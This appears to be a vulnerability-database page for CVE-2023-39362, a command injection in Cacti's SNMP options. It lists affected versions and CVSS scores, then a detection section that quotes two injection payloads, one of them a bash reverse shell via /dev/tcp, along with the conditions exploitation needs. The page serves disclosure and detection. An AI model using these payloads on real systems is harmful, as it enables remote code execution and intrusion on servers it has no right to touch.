cbcvebase.
CVE-2023-39362
published 2023-09-05

CVE-2023-39362: Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can…

PriorityP270high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
82.19%
99.6th percentile
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Affected

8 ranges
VendorProductVersion rangeFixed in
cacticacti< 1.2.251.2.25
cacticacti>= 0 < 1.2.16+ds1-2+deb11u21.2.16+ds1-2+deb11u2
cacticacti>= 0 < 1.2.24+ds1-1+deb12u11.2.24+ds1-1+deb12u1
cacticacti>= 0 < 1.2.25+ds1-11.2.25+ds1-1
cacticacti>= 0 < 1.2.25+ds1-11.2.25+ds1-1
debiancacti< cacti 1.2.24+ds1-1+deb12u1 (bookworm)cacti 1.2.24+ds1-1+deb12u1 (bookworm)
fedoraprojectfedora
fedoraprojectfedora

Detection & IOCsextracted from sources · hover to see the quote

pathlib/snmp.php
commandpublic\' ; touch /tmp/m3ssap0 ; \'
commandpublic\' ; bash -c "exec bash -i &>/dev/tcp// <&1" ; \'
path/tmp/m3ssap0
  • Monitor SNMP Community String fields in Cacti Device configuration for shell metacharacters, particularly single-quote escapes and semicolons (e.g., patterns matching `\'\s*;` or `;\'`) indicative of command injection attempts.
  • Alert on Cacti poller or web process spawning unexpected child processes (e.g., bash, touch, nc) as a result of exec() calls originating from lib/snmp.php.
  • Detect reverse shell attempts via /dev/tcp from Cacti server processes, consistent with the bash reverse shell payload used in exploitation of this CVE.
  • Exploitation can also occur via the Cacti poller on existing devices; monitor for unexpected file creation under /tmp by the Cacti poller process.
  • ·Exploitation requires the attacker to be authenticated with privileges to manage Devices and/or Graphs (e.g., 'Sites/Devices/Data', 'Graphs'); unauthenticated users cannot trigger this vulnerability.
  • ·The vulnerability is only exploitable when the PHP snmp module is NOT installed; if the PHP snmp module is present, the vulnerable exec() code path in lib/snmp.php is not reached.
  • ·A Device that supports SNMP (version 1 or 2) and has Net-SNMP Graph templates must be available; without these conditions the injection payload is not triggered.
  • ·When exploiting via an existing device through the poller, it may be necessary to change the 'Downed Device Detection' field to a non-SNMP method, as the malicious payload could break SNMP interaction with the host.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
osv7.2HIGH
vendor_debian7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.